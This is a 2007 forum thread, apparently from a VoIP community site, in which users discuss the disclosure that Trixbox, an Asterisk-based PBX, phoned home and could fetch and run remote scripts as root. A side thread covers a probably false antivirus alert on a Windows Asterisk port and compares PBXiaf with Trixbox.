 tommy13vPremium
join:2002-02-15
Niskayuna NY
 ·TelaSip
| [General] Trixbox phoning home controversy. Story:
An anonymous reader writes to let us know that users of Trixbox, a PBX based on Asterisk, recently discovered that the software has been phoning home with statistics about their installations. It's easy enough to disable, and not particularly steathy (beyond encrypting the data sent back), but customers in the forum are annoyed at not having been informed of the reporting. Trixbox is owned by Fonality, which makes customized PBXs (again based on Asterisk) for paying customers.
»yro.slashdot.org/yro/07/12/16/222243.shtml
--
Click to Call for Asterisk servers
byodvox coming soon |
|
Test99Premium
join:2003-04-24
San Jose, CA
kudos:1 | How do you feel about it, Tommy?
--
50775@fwd.pulver.com |
|
tommy13vPremium
join:2002-02-15
Niskayuna NY Reviews:
·TelaSip
| To be honest I could care less about the fact that they want to get some stats of the install base but what I do care about is that they are executing as root commands on the box and if there servers are compromised or someone working for them decides he is upset then they could in theory execute a command as root to cause a problem.
I see it as a security risk. |
|
| reply to tommy13v
Looks like from the perl script that this same approach is used by Trixbox Pro and Fonality to grab data from those systems too.
One hacker breaks into update.fonality.com and they can be running scripts on Fonality based PBX's across the world. As root. And I bet that the Fonality PBX's are almost all inside the firewall, so who knows how much damage this thing could do inside a company?
And the Fonality people fess up to Trixbox CE having the issue, but leave out that Fonality and Trixbox Pro systems are just as vulnerable. That really is pretty crappy behavior. |
|
cbrain
join:2000-05-21
Silver Spring, MD Reviews:
·Future Nine Corp..
·Google Voice
 ·Verizon FiOS
 ·DSL EXTREME
| reply to tommy13v
Nerd Vittles takes notice Monday, December 17, 2007
Just Say No: Hidden BOTs and Asterisk Don't Mix
... Our objection is more fundamental and goes to the existence of the tool itself and the failure to disclose it. Unfortunately, a remotely configurable BOT with root access privileges is a bit like giving someone a blank check… with your signature affixed. And it’s worse in this case because users had no notice that they were handing over the keys to their castle by installing and using trixbox. One can’t help wondering if Fonality management really grasps how dangerous such a system design is in this day and age. This isn’t about the commands that Fonality was executing. It’s about the commands that could be executed if this system were ever compromised. We have daily logs full of attempts to hack our systems using, you guessed it, remotely controlled BOTS.
...
»nerdvittles.com/index.php?p=198 |
|
Test99Premium
join:2003-04-24
San Jose, CA
kudos:1 | Not Just Trixbox I recently installed a Windows port of Asterisk from this site: »www.asteriskwin32.com/ to evaluate it.
The next Zone Alarm scan discovered this nasty critter:
Win32.Backdoor.IRCBot.td
in c:\Program Files\cygroot\bin\cygwin.dll
This is the registry entry:
File: C:\Program Files\cygroot\bin\cygwin1.dll
Module: C:\Program Files\cygroot\bin\cygwin1.dll
RegistryKey: HKEY_CURRENT_USER\Software\Cygnus Solutions
RegistryKey: HKEY_LOCAL_MACHINE\SOFTWARE\Cygnus Solutions
I'm still investigating to see what I have to do to clean the system.
--
50775@fwd.pulver.com |
|
cbrain
join:2000-05-21
Silver Spring, MD Reviews:
·Future Nine Corp..
·Google Voice
·Verizon FiOS
·DSL EXTREME
| Re: [General] Trixbox phoning home controversy. said by feelyou22 :
do you feel about it,
I feel hurt ... betrayed ... vulnerable. I never thought free software I was so strongly attracted to would do something like this to me.  |
|
| reply to tommy13v
said by tommy13v:To be honest I could care less about the fact that they want to get some stats of the install base the implementation was really bad.. it would actually download a script from fonality servers and execute it (possibly as root).
that script could do ANYTHING.. including sniffing your network to installing backdoors/trojans, ____ (fill in your worst case nightmare) |
|
tommy13vPremium
join:2002-02-15
Niskayuna NY | reply to Test99
Re: Not Just Trixbox That DLL acts as a Linux API emulation layer providing the linux functionality. |
|
|
|
kaila
join:2000-10-11
Lincolnshire, IL
1 edit | reply to tommy13v
Re: [General] Trixbox phoning home controversy. Fonality has been attempting (if quietly) to monetize trixbox and their user base for a while now, and I think this was an obviously not well thought out attempt to collect what users are doing with CE toward that end. While not quite as bad as Sony's rootkit fiasco, it is a pretty serious issue and potentially reputation destroying. Kerry, Chris, and Andrew are certainly getting hammered for it.
Right now they seem to be doing the best they can at the moment (capitulating, and promising to remove the vulnerability), but time will tell if these and future actions will have a positive effect. This is certainly a teaching moment if there ever was one. Trixbox may ultimately benefit if it forces Fonality to rethink what's best for trixbox within their organization.
For now, I'm using PBXiaf. |
|
tommy13vPremium
join:2002-02-15
Niskayuna NY | how is PBXiaf going for you? |
|
Test99Premium
join:2003-04-24
San Jose, CA
kudos:1 | reply to tommy13v
Re: Not Just Trixbox said by tommy13v:That DLL acts as a Linux API emulation layer providing the linux functionality. Understood. What's not yet clear is where it acquired the ability to take orders from Internet Relay Chat.
--
50775@fwd.pulver.com |
|
kaila
join:2000-10-11
Lincolnshire, IL | reply to tommy13v
Re: [General] Trixbox phoning home controversy. said by tommy13v:how is PBXiaf going for you? Amazingly well actually. The install is simple and produces a very stable system. Config Edit is rolled into freePBX and endpoint management is there (one feature trixbox did well and I don't think I can live without). There are the 'kitchen sink' aspects of trixbox that PBXiaf can't match. But perhaps due to the overall simplicity of the install, they have been able to steadily crank out script based features. Overall I'm happy and would recommend it to almost anyone.
Ward's the one who got me into asterisk, and he always seems to have the right combination of technical knowledge, careful motivation, and communication skills to put people on the path to successful asterisk based systems. |
|
| said by kaila:... Config Edit is rolled into freePBX and endpoint management is there (one feature trixbox did well and I don't think I can live without). There are the 'kitchen sink' aspects of trixbox that PBXiaf can't match. But perhaps due to the overall simplicity of the install, they have been able to steadily crank out script based features. Overall I'm happy and would recommend it to almost anyone. ... What features are in Trixbox that are not included in PBXiaf? |
|
kaila
join:2000-10-11
Lincolnshire, IL | said by celtic:What features are in Trixbox that are not included in PBXiaf? Both use freePBX for configuring the server, so trixbox really adds nothing over PBXiaf from the standpoint of taking/making/routing calls.
Trixbox does offer HUDlite, trixnet (a kind of trixbox enum service), and literally hundreds of extra packages that a very small minority would find useful. On the other side, PBXiaf offers a small but growing number of their own add-ons as well, that in general have a broader appeal. |
|
rugbyI think I know it all.VIP
join:2000-09-26
Indianapolis, IN | reply to celtic
A decent endpoint manager for most IP phones. |
|
kaila
join:2000-10-11
Lincolnshire, IL
1 edit | said by rugby:A decent endpoint manager for most IP phones. Agreed. While PBXiaf does offer endpoint management, it is not gui based like trixbox, and requires hand editing config files. Gui based endpoint management is on the freePBX roadmap for version 3, but that release is a long way off.... |
|
BPremium,MVM
join:2000-10-28 | reply to Test99
Re: Not Just Trixbox I'm betting (guessing) that it didn't, and that this is a false positive... Good luck. You could try running it by one of the multi-engine scanners (Jotti).
-- B
--
In a realm outside causality and function |
|
Test99Premium
join:2003-04-24
San Jose, CA
kudos:1 | said by B:I'm betting (guessing) that it didn't, and that this is a false positive... Good suggestion. You may be right. Scans thus far have not detected any other signs of intrusion. Writing malware detection programs must be a difficult assignment.
--
50775@fwd.pulver.com |
|
